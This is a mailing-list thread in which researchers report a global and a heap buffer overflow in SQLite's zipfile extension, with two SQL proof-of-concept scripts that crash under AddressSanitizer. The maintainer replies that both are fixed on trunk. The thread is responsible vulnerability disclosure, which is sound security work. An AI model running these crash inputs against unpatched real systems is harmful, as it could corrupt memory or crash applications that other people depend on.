Re: [sqlite] Buffer Overflow bugs In Sqlite

[Richard Hipp]

On 12/26/19, Yongheng Chen  wrote:
> Hi,
>
> We found a global buffer overflow and a heap buffer overflow in sqlite.

Thanks for the report.  Now fixed on trunk.

Just to be clear to on-lookers, these problems are in the "zipfile"
extension (https://www.sqlite.org/zipfile.html) not in the SQLite
core.  Zipfile is included as part of the command-line shell, but it
is not included in the SQLite amalgamation, and consequently is
unlikely to be included as part of your application.


> Here’s the POC (trigger with asan):
>
> Global buffer overflow:
> —
> CREATE TABLE v0 ( v6 INTEGER UNIQUE , v5 , v3 , v4 , v2 , v7 , v1 ) ; INSERT
> INTO v0 ( v3 ) VALUES ( 0 ) ,( 10 ) ,( 10.10 ) ,( 10 ) ,( 10 ) ,( 10 )
> ,( 10 ) ,( 10 ) ,( 1 ) ,( 'GERMANY' ) ,( 'LG PKG' ) ,( 'SM PKG' ) ,(
> '%%green%%' ) ,( 'DELIVER IN PERSON' ) ,( 'MED PKG' ) ; SELECT v5 , lag ( v1
> , 10.10 ) OVER( PARTITION BY v1 ORDER BY v5 ) FROM v0 ; ANALYZE v0 ;
> CREATE VIRTUAL TABLE v8 USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE
> NOT NULL UNIQUE ON CONFLICT REPLACE ) ; ANALYZE ; REPLACE INTO v8 SELECT *
> FROM v0 ; SELECT * FROM v0 AS c NATURAL JOIN v0 AS p , v0 NATURAL JOIN v8
> NATURAL JOIN v0 ;
> —
>
> Heap buffer overflow:
> —
> CREATE TABLE v0 ( v5 INTEGER UNIQUE , v6 , v7 , v2 , v3 , v4 INTEGER UNIQUE
> ON CONFLICT IGNORE CHECK( 10 ) CHECK( 10 ) , v1 ) ; INSERT INTO v0 ( v4 )
> VALUES ( 10 ) ,( 1 ) ,( 10 ) ; SELECT v4 , lag ( v2 , 0.10 ) OVER(
> PARTITION BY v4 ORDER BY v6 ) FROM v0 ; ANALYZE v0 ; CREATE VIRTUAL TABLE v8
> USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ) ;
> ANALYZE ; REPLACE INTO v8 SELECT * FROM v0 ; SELECT * FROM v8 AS c NATURAL
> JOIN v8 AS p , v0 NATURAL JOIN v8 NATURAL JOIN v8 ;
> —
>
> The bug exists in the latest development code of sqlite.
>
> Yongheng & Rui
>
> ___
> sqlite-users mailing list
> sqlite-users@mailinglists.sqlite.org
> http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
>


-- 
D. Richard Hipp
d...@sqlite.org
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users

[sqlite] Buffer Overflow bugs In Sqlite

[Yongheng Chen]

Hi, 

We found a global buffer overflow and a heap buffer overflow in sqlite. Here’s 
the POC (trigger with asan):

Global buffer overflow:
—
CREATE TABLE v0 ( v6 INTEGER UNIQUE , v5 , v3 , v4 , v2 , v7 , v1 ) ; INSERT 
INTO v0 ( v3 ) VALUES ( 0 ) ,( 10 ) ,( 10.10 ) ,( 10 ) ,( 10 ) ,( 10 ) ,( 
10 ) ,( 10 ) ,( 1 ) ,( 'GERMANY' ) ,( 'LG PKG' ) ,( 'SM PKG' ) ,( '%%green%%' ) 
,( 'DELIVER IN PERSON' ) ,( 'MED PKG' ) ; SELECT v5 , lag ( v1 , 10.10 ) 
OVER( PARTITION BY v1 ORDER BY v5 ) FROM v0 ; ANALYZE v0 ; CREATE VIRTUAL TABLE 
v8 USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ON 
CONFLICT REPLACE ) ; ANALYZE ; REPLACE INTO v8 SELECT * FROM v0 ; SELECT * FROM 
v0 AS c NATURAL JOIN v0 AS p , v0 NATURAL JOIN v8 NATURAL JOIN v0 ;
—

Heap buffer overflow:
—
CREATE TABLE v0 ( v5 INTEGER UNIQUE , v6 , v7 , v2 , v3 , v4 INTEGER UNIQUE ON 
CONFLICT IGNORE CHECK( 10 ) CHECK( 10 ) , v1 ) ; INSERT INTO v0 ( v4 ) VALUES ( 
10 ) ,( 1 ) ,( 10 ) ; SELECT v4 , lag ( v2 , 0.10 ) OVER( PARTITION BY v4 
ORDER BY v6 ) FROM v0 ; ANALYZE v0 ; CREATE VIRTUAL TABLE v8 USING zipfile ( v9 
PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ) ; ANALYZE ; REPLACE INTO v8 
SELECT * FROM v0 ; SELECT * FROM v8 AS c NATURAL JOIN v8 AS p , v0 NATURAL JOIN 
v8 NATURAL JOIN v8 ;
—

The bug exists in the latest development code of sqlite.

Yongheng & Rui

___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users